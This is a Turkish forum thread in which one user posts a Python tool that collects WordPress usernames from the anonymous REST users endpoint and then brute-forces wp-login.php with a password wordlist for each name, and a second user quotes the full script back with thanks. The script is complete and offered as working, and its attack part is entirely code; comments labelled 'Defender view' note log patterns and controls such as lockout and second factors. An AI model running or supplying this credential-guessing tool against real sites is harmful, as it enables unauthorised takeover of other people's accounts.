Wordpress Username Enumerate ve Brute-Forcer

z3n

Üye
26 Kas 2023
WordPress'ten kullanıcı adlarını enumerate eder ve doğrudan brute-force yapmaya çalışır; gayet de çalışıyor.
Python:
#!/usr/bin/env python3

import os
import subprocess
import requests
import json

# Fixed browser-style User-Agent sent with every request this script makes.
# The value never changes between requests, so it appears verbatim in the
# target's access logs and can be matched there.
user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
# Directory (relative to the current working directory) for the username logs.
output_dir = "log"
# NOTE: this prompt runs at module load, before the argument check in the
# __main__ block, so the script asks for a wordlist even when it is about to
# exit with the usage message.
wordlist_file = input("Wordlist: ")


def banner():
    """Clear the terminal and print the tool's one-line banner.

    The banner says "Exploit", but the functions in this file only list
    user slugs and submit password guesses; no vulnerability is exploited.
    """
    os.system("clear")
    title = """ ##KarsikaX WP Exploit## """
    print(title)


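def create_log(url, user_list):
    """Write the enumerated usernames to ``<output_dir>/<host>``, one per line.

    The file name is the host part of *url* with every ``.`` replaced by
    ``_``. An existing file of that name is overwritten.

    Args:
        url: Base URL containing ``//`` (``main`` only passes http(s) URLs).
        user_list: Iterable of usernames; each is written followed by a newline.
    """
    # exist_ok avoids the check-then-create race of exists() + makedirs().
    os.makedirs(output_dir, exist_ok=True)

    host = url.split('//')[1].split('/')[0]
    log_path = os.path.join(output_dir, host.replace('.', '_'))

    with open(log_path, 'w') as file:
        # The names come from a remote server's response and are written as-is.
        file.writelines(f"{user}\n" for user in user_list)

    print(f"[+] All found usernames are stored in {log_path}")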


def bruteforce(target, username, password_list):
    """Submit each password in *password_list* for *username* to the login form.

    Every attempt is a POST to ``{target}/wp-login.php`` carrying the ``log``,
    ``pwd`` and ``wp-submit`` form fields and the module-level ``user_agent``.
    An attempt counts as successful when the URL of the response contains
    ``wp-admin``.

    Returns True on the first attempt that matches, False once the list is
    exhausted.

    Defender view: the loop sends its requests back to back, with no pause
    and no per-account cap, so it shows up in access logs as a run of POSTs
    to wp-login.php from one client with one User-Agent. Login throttling or
    lockout and a second authentication factor are the usual controls
    against this pattern.
    """
    for password in password_list:
        # Loop-invariant value, rebuilt on every iteration.
        login_url = f"{target}/wp-login.php"
        data = {"log": username, "pwd": password, "wp-submit": "Log In"}

        response = requests.post(login_url, data=data, headers={"User-Agent": user_agent})

        # Success is inferred from the response URL alone, not from cookies
        # or page content.
        if "wp-admin" in response.url:
            # The matching credential pair is printed in clear text.
            print(f"[+] Successful login: {username} : {password}")
            return True

    print(f"[-] Brute-force unsuccessful for username: {username}")
    return False


def read_wordlist(wordlist_file):
    """Return every line of *wordlist_file* with surrounding whitespace stripped.

    Blank lines are kept as empty strings. The file is opened in text mode
    with the platform's default encoding.
    """
    entries = []
    with open(wordlist_file, 'r') as handle:
        for raw_line in handle:
            entries.append(raw_line.strip())
    return entries


def enum_from_json(target):
    """List user slugs from the WordPress REST API and try passwords for each.

    Sends a GET with no credentials to ``{target}/wp-json/wp/v2/users/``. On
    any status other than 200 it prints a message and returns. Otherwise it
    takes the ``slug`` field of every returned object, writes the slugs to
    the log via ``create_log``, loads the wordlist named by the module-level
    ``wordlist_file`` and calls ``bruteforce`` once per slug, using the slug
    as the login name.

    Defender view: the whole chain starts from one anonymous request to the
    users endpoint, so restricting that endpoint to authenticated callers
    removes this source of account names. A GET to /wp-json/wp/v2/users/
    followed by a run of wp-login.php POSTs from the same client is the
    sequence to look for in logs.
    """
    url = f"{target}/wp-json/wp/v2/users/"
    response = requests.get(url, headers={"User-Agent": user_agent})

    if response.status_code != 200:
        print("[-] Unable to find user from JSON")
    else:
        # The body is parsed and indexed without validation; this assumes a
        # JSON list of objects that each carry a "slug" key.
        user_data = response.json()
        user_list = [user["slug"] for user in user_data]
        user_total = len(user_list)
        print(f"[+] Found {user_total} usernames in /wp-json")
        create_log(target, user_list)

        # Reads the module-level wordlist_file, not a parameter.
        wordlist = read_wordlist(wordlist_file)

        # The return value of bruteforce() is ignored; every slug is tried.
        for username in user_list:
            bruteforce(target, username, wordlist)


def main(target):
    """Check that *target* starts with http:// or https://, then run the scan.

    The scheme prefix (compared case-insensitively) is the only validation
    applied. A target that fails it prints an error and exits with status 1.
    """
    has_http_scheme = target.lower().startswith(("http://", "https://"))

    if not has_http_scheme:
        print("[-] Your given URL seems to be invalid.")
        exit(1)

    print(f"[+] Start scanning {target}")
    enum_from_json(target)
    print("[+] Finished scanning.")


if __name__ == "__main__":
    import sys

    banner()

    # Exactly one argument, the base URL, is accepted; anything else prints
    # the usage line and exits with status 0.
    argv = sys.argv
    if len(argv) != 2:
        print("[+] Usage: {} <url>".format(argv[0]))
        exit(0)

    main(argv[1])
 

Privarp

Anka Team Junior
8 Nis 2022
Wordpressten usernameyi enum eder ve direkt bruteforce yapmaya çalışır gayette çalışıyor.
Python:
#!/usr/bin/env python3

import os
import subprocess
import requests
import json

# Fixed browser-style User-Agent sent with every request this script makes.
# The value never changes between requests, so it appears verbatim in the
# target's access logs and can be matched there.
user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0"
# Directory (relative to the current working directory) for the username logs.
output_dir = "log"
# NOTE: this prompt runs at module load, before the argument check in the
# __main__ block, so the script asks for a wordlist even when it is about to
# exit with the usage message.
wordlist_file = input("Wordlist: ")


def banner():
    """Clear the terminal and print the tool's one-line banner.

    The banner says "Exploit", but the functions in this file only list
    user slugs and submit password guesses; no vulnerability is exploited.
    """
    os.system("clear")
    title = """ ##KarsikaX WP Exploit## """
    print(title)


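def create_log(url, user_list):
    """Write the enumerated usernames to ``<output_dir>/<host>``, one per line.

    The file name is the host part of *url* with every ``.`` replaced by
    ``_``. An existing file of that name is overwritten.

    Args:
        url: Base URL containing ``//`` (``main`` only passes http(s) URLs).
        user_list: Iterable of usernames; each is written followed by a newline.
    """
    # exist_ok avoids the check-then-create race of exists() + makedirs().
    os.makedirs(output_dir, exist_ok=True)

    host = url.split('//')[1].split('/')[0]
    log_path = os.path.join(output_dir, host.replace('.', '_'))

    with open(log_path, 'w') as file:
        # The names come from a remote server's response and are written as-is.
        file.writelines(f"{user}\n" for user in user_list)

    print(f"[+] All found usernames are stored in {log_path}")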


def bruteforce(target, username, password_list):
    """Submit each password in *password_list* for *username* to the login form.

    Every attempt is a POST to ``{target}/wp-login.php`` carrying the ``log``,
    ``pwd`` and ``wp-submit`` form fields and the module-level ``user_agent``.
    An attempt counts as successful when the URL of the response contains
    ``wp-admin``.

    Returns True on the first attempt that matches, False once the list is
    exhausted.

    Defender view: the loop sends its requests back to back, with no pause
    and no per-account cap, so it shows up in access logs as a run of POSTs
    to wp-login.php from one client with one User-Agent. Login throttling or
    lockout and a second authentication factor are the usual controls
    against this pattern.
    """
    for password in password_list:
        # Loop-invariant value, rebuilt on every iteration.
        login_url = f"{target}/wp-login.php"
        data = {"log": username, "pwd": password, "wp-submit": "Log In"}

        response = requests.post(login_url, data=data, headers={"User-Agent": user_agent})

        # Success is inferred from the response URL alone, not from cookies
        # or page content.
        if "wp-admin" in response.url:
            # The matching credential pair is printed in clear text.
            print(f"[+] Successful login: {username} : {password}")
            return True

    print(f"[-] Brute-force unsuccessful for username: {username}")
    return False


def read_wordlist(wordlist_file):
    """Return every line of *wordlist_file* with surrounding whitespace stripped.

    Blank lines are kept as empty strings. The file is opened in text mode
    with the platform's default encoding.
    """
    entries = []
    with open(wordlist_file, 'r') as handle:
        for raw_line in handle:
            entries.append(raw_line.strip())
    return entries


def enum_from_json(target):
    """List user slugs from the WordPress REST API and try passwords for each.

    Sends a GET with no credentials to ``{target}/wp-json/wp/v2/users/``. On
    any status other than 200 it prints a message and returns. Otherwise it
    takes the ``slug`` field of every returned object, writes the slugs to
    the log via ``create_log``, loads the wordlist named by the module-level
    ``wordlist_file`` and calls ``bruteforce`` once per slug, using the slug
    as the login name.

    Defender view: the whole chain starts from one anonymous request to the
    users endpoint, so restricting that endpoint to authenticated callers
    removes this source of account names. A GET to /wp-json/wp/v2/users/
    followed by a run of wp-login.php POSTs from the same client is the
    sequence to look for in logs.
    """
    url = f"{target}/wp-json/wp/v2/users/"
    response = requests.get(url, headers={"User-Agent": user_agent})

    if response.status_code != 200:
        print("[-] Unable to find user from JSON")
    else:
        # The body is parsed and indexed without validation; this assumes a
        # JSON list of objects that each carry a "slug" key.
        user_data = response.json()
        user_list = [user["slug"] for user in user_data]
        user_total = len(user_list)
        print(f"[+] Found {user_total} usernames in /wp-json")
        create_log(target, user_list)

        # Reads the module-level wordlist_file, not a parameter.
        wordlist = read_wordlist(wordlist_file)

        # The return value of bruteforce() is ignored; every slug is tried.
        for username in user_list:
            bruteforce(target, username, wordlist)


def main(target):
    """Check that *target* starts with http:// or https://, then run the scan.

    The scheme prefix (compared case-insensitively) is the only validation
    applied. A target that fails it prints an error and exits with status 1.
    """
    has_http_scheme = target.lower().startswith(("http://", "https://"))

    if not has_http_scheme:
        print("[-] Your given URL seems to be invalid.")
        exit(1)

    print(f"[+] Start scanning {target}")
    enum_from_json(target)
    print("[+] Finished scanning.")


if __name__ == "__main__":
    import sys

    banner()

    # Exactly one argument, the base URL, is accepted; anything else prints
    # the usage line and exits with status 0.
    argv = sys.argv
    if len(argv) != 2:
        print("[+] Usage: {} <url>".format(argv[0]))
        exit(0)

    main(argv[1])
Elinize sağlık.
 